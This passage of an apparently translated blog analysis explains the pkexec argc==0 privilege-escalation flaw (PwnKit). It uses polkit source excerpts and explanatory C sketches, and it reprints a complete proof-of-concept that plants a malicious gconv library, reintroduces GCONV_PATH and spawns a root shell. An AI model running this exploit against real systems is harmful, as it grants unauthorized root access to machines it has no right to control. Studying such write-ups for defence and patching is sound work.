<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">88</span> log_message (gint level,</span><br><span class="line"> <span class="number">89</span> gboolean print_to_stderr,</span><br><span class="line"> <span class="number">90</span> <span class="keyword">const</span> gchar *format,</span><br><span class="line"> <span class="number">91</span> ...)</span><br><span class="line"> <span class="number">92</span> {</span><br><span class="line"> ...</span><br><span class="line"> <span class="number">125</span> <span class="keyword">if</span> (print_to_stderr)</span><br><span class="line"> <span class="number">126</span> g_printerr (<span class="string">"%s\n"</span>, s);</span><br><span class="line">------------------------------------------------------------------------</span><br><span class="line"> <span class="number">383</span> validate_environment_variable (<span class="keyword">const</span> gchar *key,</span><br><span class="line"> <span class="number">384</span> <span class="keyword">const</span> gchar *value)</span><br><span class="line"> <span class="number">385</span> {</span><br><span class="line"> ...</span><br><span class="line"> <span class="number">406</span> log_message (LOG_CRIT, TRUE,</span><br><span class="line"> <span class="number">407</span> <span class="string">"The value for the SHELL variable was not found the /etc/shells file"</span>);</span><br><span class="line"> <span class="number">408</span> g_printerr (<span class="string">"\n"</span></span><br><span class="line"> <span class="number">409</span> <span class="string">"This incident has been reported.\n"</span>);</span><br></pre></td></tr></table></figure>
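<p>Which error path fires depends on the check inside <code>validate_environment_variable()</code>. Below is a minimal sketch of the SHELL check, assuming (as I understand polkit's <code>is_valid_shell()</code>) that the value must exactly match one line of /etc/shells. The function name <code>is_listed_shell()</code> is hypothetical, and the file contents are passed in as a string so the sketch does not touch the real file. A value such as <code>pwnkit</code> fails this check, which sends pkexec into <code>log_message()</code> and <code>g_printerr()</code>.</p>

```c
#include <assert.h>
#include <string.h>

/* Hypothetical re-creation of the SHELL check: returns 1 if `shell`
 * exactly matches one newline-separated line of `shells_file`. */
static int is_listed_shell(const char *shell, const char *shells_file)
{
    assert(shell != NULL && shells_file != NULL);
    size_t len = strlen(shell);
    const char *line = shells_file;
    while (*line != '\0') {
        const char *end = strchr(line, '\n');
        size_t line_len = end ? (size_t)(end - line) : strlen(line);
        if (line_len == len && strncmp(line, shell, len) == 0)
            return 1;                  /* exact, whole-line match */
        if (end == NULL)
            break;                     /* last line had no trailing newline */
        line = end + 1;
    }
    return 0;                          /* not listed: pkexec logs an error */
}
```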
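<p><code>g_printerr()</code> normally prints UTF-8 messages, but if the environment variable CHARSET is not UTF-8, it prints them in that other character set instead (note: CHARSET is not security-sensitive, so it is not one of the unsafe environment variables).</p>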
<p>To convert a message from UTF-8 to another character set, <code>g_printerr()</code> calls glibc's function <code>iconv_open()</code>.</p>
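<p>For reference, a minimal use of the iconv API looks like the sketch below. <code>convert()</code> is a hypothetical wrapper, and the ASCII target is chosen only because practically every libc supports it. Note that <code>iconv_open()</code> takes the target charset first and the source charset second; it is at this call that glibc looks up the converter, which for a charset that is not built in means reading gconv-modules and loading a shared library.</p>

```c
#include <assert.h>
#include <iconv.h>
#include <string.h>

/* Hypothetical wrapper: converts the NUL-terminated string `in` from
 * charset `from` to charset `to` into `out`. Returns the number of
 * bytes written, or -1 if no converter exists or conversion fails.
 * Suitable for stateless charsets only; stateful ones need a final
 * flush call iconv(cd, NULL, NULL, &outp, &out_left). */
static long convert(const char *to, const char *from,
                    const char *in, char *out, size_t out_len)
{
    assert(in != NULL && out != NULL);
    iconv_t cd = iconv_open(to, from);   /* target first, then source */
    if (cd == (iconv_t)-1)
        return -1;                       /* no converter for this pair */
    char *inp = (char *)in;              /* iconv() takes char **, not const */
    size_t in_left = strlen(in);
    char *outp = out;
    size_t out_left = out_len;
    size_t rc = iconv(cd, &inp, &in_left, &outp, &out_left);
    iconv_close(cd);
    if (rc == (size_t)-1)
        return -1;
    return (long)(out_len - out_left);
}
```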
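<p>To convert a message from one character set to another, <code>iconv_open()</code> executes small shared libraries. Normally, these triples (the “from” charset, the “to” charset, and the library name) are read from the default configuration file <code>/usr/lib/gconv/gconv-modules</code> (the exact directory varies by distribution). However, the environment variable <code>GCONV_PATH</code> can force <code>iconv_open()</code> to read a different configuration file. Because that leads to executing an arbitrary library, <code>GCONV_PATH</code> is one of the unsafe environment variables, and ld.so removes it from the environment of SUID programs.</p>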
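<p>Each <code>module</code> line in a gconv-modules file carries exactly those fields plus an optional cost. The sketch below parses one such line and computes which shared object would be loaded. <code>parse_module_line()</code>, <code>module_path()</code> and <code>struct module_line</code> are hypothetical; the resolution rule (a relative module name is taken relative to the directory of the configuration file, with <code>.so</code> appended if missing) and the default cost of 1 are my reading of glibc's behaviour, not a reimplementation of it. <code>alias</code> lines and comments are not handled.</p>

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical representation of one "module" line of gconv-modules. */
struct module_line {
    char from[64];   /* source charset, e.g. "UTF-8//" */
    char to[64];     /* target charset */
    char file[128];  /* shared-object name */
    int cost;        /* optional conversion cost */
};

/* Parses "module FROM TO FILE [COST]". Returns 1 on success, 0 otherwise.
 * Assumes a cost of 1 when the field is omitted. */
static int parse_module_line(const char *line, struct module_line *m)
{
    assert(line != NULL && m != NULL);
    m->cost = 1;
    int n = sscanf(line, " module %63s %63s %127s %d",
                   m->from, m->to, m->file, &m->cost);
    return n >= 3;
}

/* Builds the path of the shared object to load: `dir` is the directory
 * of the gconv-modules file; ".so" is appended if the name lacks it. */
static void module_path(char *out, size_t len, const char *dir, const char *file)
{
    size_t flen = strlen(file);
    const char *ext = (flen >= 3 && strcmp(file + flen - 3, ".so") == 0) ? "" : ".so";
    if (file[0] == '/')
        snprintf(out, len, "%s%s", file, ext);          /* absolute: used as-is */
    else
        snprintf(out, len, "%s/%s%s", dir, file, ext);  /* relative to config dir */
}
```

<p>Applied to the line <code>module UTF-8// PWNKIT// pwnkit 2</code> with the configuration directory <code>./pwnkit</code>, this yields <code>./pwnkit/pwnkit.so</code>.</p>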
<p>Therefore, we can use the out-of-bounds write to reintroduce <code>GCONV_PATH</code> into pkexec's environment and have our own shared library executed as root.</p>
<h3 id="回顾-POC"><a href="#回顾-POC" class="headerlink" title="回顾 POC"></a>Revisiting the POC</h3><p>Now that we understand the vulnerability better, let's look at the POC again:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"> <span class="number">2</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"> <span class="number">3</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"> <span class="number">4</span> </span><br><span class="line"> <span class="number">5</span> <span class="keyword">char</span> *shell =</span><br><span class="line"> <span class="number">6</span> <span class="string">"#include <stdio.h>\n"</span></span><br><span class="line"> <span class="number">7</span> <span class="string">"#include <stdlib.h>\n"</span></span><br><span class="line"> <span class="number">8</span> <span class="string">"#include <unistd.h>\n\n"</span></span><br><span class="line"> <span 
class="number">9</span> <span class="string">"void gconv() {}\n"</span></span><br><span class="line"><span class="number">10</span> <span class="string">"void gconv_init() {\n"</span></span><br><span class="line"><span class="number">11</span> <span class="string">" setuid(0); setgid(0);\n"</span></span><br><span class="line"><span class="number">12</span> <span class="string">" seteuid(0); setegid(0);\n"</span></span><br><span class="line"><span class="number">13</span> <span class="string">" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"</span></span><br><span class="line"><span class="number">14</span> <span class="string">" exit(0);\n"</span></span><br><span class="line"><span class="number">15</span> <span class="string">"}"</span>;</span><br><span class="line"><span class="number">16</span> </span><br><span class="line"><span class="number">17</span> <span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"><span class="number">18</span> FILE *fp;</span><br><span class="line"><span class="number">19</span> system(<span class="string">"mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"</span>);</span><br><span class="line"><span class="number">20</span> system(<span class="string">"mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"</span>);</span><br><span class="line"><span class="number">21</span> fp = fopen(<span class="string">"pwnkit/pwnkit.c"</span>, <span class="string">"w"</span>);</span><br><span class="line"><span class="number">22</span> <span class="built_in">fprintf</span>(fp, <span class="string">"%s"</span>, shell);</span><br><span class="line"><span class="number">23</span> fclose(fp); </span><br><span class="line"><span 
class="number">24</span> system(<span class="string">"gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"</span>);</span><br><span class="line"><span class="number">25</span> <span class="keyword">char</span> *env[] = { <span class="string">"pwnkit"</span>, <span class="string">"PATH=GCONV_PATH=."</span>, <span class="string">"CHARSET=PWNKIT"</span>, <span class="string">"SHELL=pwnkit"</span>, <span class="literal">NULL</span> };</span><br><span class="line"><span class="number">26</span> execve(<span class="string">"/usr/bin/pkexec"</span>, (<span class="keyword">char</span>*[]){<span class="literal">NULL</span>}, env);</span><br><span class="line"><span class="number">27</span> }</span><br></pre></td></tr></table></figure>
<p>The new points to note are:</p>
<ol>
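<li>L26: <code>execve</code> runs <code>pkexec</code> with <code>(char*[]){NULL}</code> as its argv, so argc is 0 and pkexec's read of <code>argv[1]</code> goes out of bounds (it actually reads <code>envp[0]</code>).</li>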
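<li>L25: a carefully crafted environment array. <code>env[0]</code> (<code>pwnkit</code>) is the string pkexec mistakes for <code>argv[1]</code>; <code>env[1]</code> (<code>PATH=GCONV_PATH=.</code>) makes pkexec resolve it to <code>GCONV_PATH=./pwnkit</code> and write that back over <code>env[0]</code>, reintroducing <code>GCONV_PATH</code>; <code>CHARSET=PWNKIT</code> selects a non-UTF-8 charset; and <code>SHELL=pwnkit</code> is not listed in /etc/shells, which sends pkexec down the error path that calls <code>g_printerr()</code>.</li>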
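<li>L20: writes <code>pwnkit/gconv-modules</code>, declaring a conversion from UTF-8 to the PWNKIT charset handled by the module <code>pwnkit</code> (compiled at L24 into <code>pwnkit/pwnkit.so</code>). With <code>GCONV_PATH=./pwnkit</code> and <code>CHARSET=PWNKIT</code> in place, printing the error message makes <code>iconv_open()</code> load this library and call its <code>gconv_init()</code>, which sets the uid and gid to 0, restores a normal <code>PATH</code>, removes the temporary files, and runs <code>/bin/sh</code>, yielding a root shell.</li>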
</ol>
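<p>The environment-side effect of L25 can also be checked with a small model. In this hypothetical sketch, <code>lookup()</code> is a getenv()-style search over an explicit envp array and <code>inject()</code> reproduces, in simplified form, pkexec's resolve-and-write-back step using the single PATH entry (again without the existence check that the real <code>g_find_program_in_path()</code> performs).</p>

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical getenv()-style lookup over an explicit envp array:
 * returns the text after "key=", or NULL if no entry matches. */
static const char *lookup(char **envp, const char *key)
{
    size_t klen = strlen(key);
    for (; *envp != NULL; envp++)
        if (strncmp(*envp, key, klen) == 0 && (*envp)[klen] == '=')
            return *envp + klen + 1;
    return NULL;
}

/* Simplified model of pkexec with argc == 0: argv[1] is really envp[0];
 * it is joined with the PATH entry and written back in place. */
static void inject(char **argv, char *buf, size_t len)
{
    char **envp = argv + 1;             /* envp starts right after argv's NULL */
    const char *dir = lookup(envp, "PATH");
    assert(argv[0] == NULL && dir != NULL);
    snprintf(buf, len, "%s/%s", dir, argv[1]);
    argv[1] = buf;                      /* overwrites envp[0] */
}
```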
<h2 id="0x03-漏洞总结"><a href="#0x03-漏洞总结" class="headerlink" title="0x03 漏洞总结"></a>0x03 Summary</h2><p>To summarize, the exploit works as follows:</p>
<ol>
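<li>Call pkexec through <code>execve()</code> with an empty argv[] (argc = 0), so that pkexec reads <code>argv[1]</code> out of bounds (really <code>envp[0]</code>) and writes a resolved path back into it, smuggling an unsafe variable past the SUID environment sanitization.</li>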
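<li>Use the <code>g_printerr()</code> error path, which runs before pkexec calls <code>clearenv()</code>, to reach <code>iconv_open()</code>, which honors the controllable unsafe environment variable <code>GCONV_PATH</code>.</li>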
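<li>Craft a malformed directory name (<code>GCONV_PATH=.</code>) so that pkexec injects <code>GCONV_PATH=./pwnkit</code> into its own environment; <code>iconv_open()</code> then loads our shared library from that path as root, completing the privilege escalation.</li>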
</ol>
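<p>The root cause is that pkexec indexes argv without ever checking argc. As far as I know, the upstream polkit fix simply makes pkexec exit early when <code>argc &lt; 1</code>. A more general defensive pattern is a bounds-checked accessor; <code>arg_at()</code> below is a hypothetical helper, not part of polkit.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical bounds-checked accessor: returns argv[i] only if i is a
 * real argument index (0 <= i < argc), otherwise NULL. With argc == 0,
 * arg_at(argc, argv, 1) therefore never reaches envp[0]. */
static const char *arg_at(int argc, char **argv, int i)
{
    assert(argc >= 0 && argv != NULL);
    return (i >= 0 && i < argc) ? argv[i] : NULL;
}
```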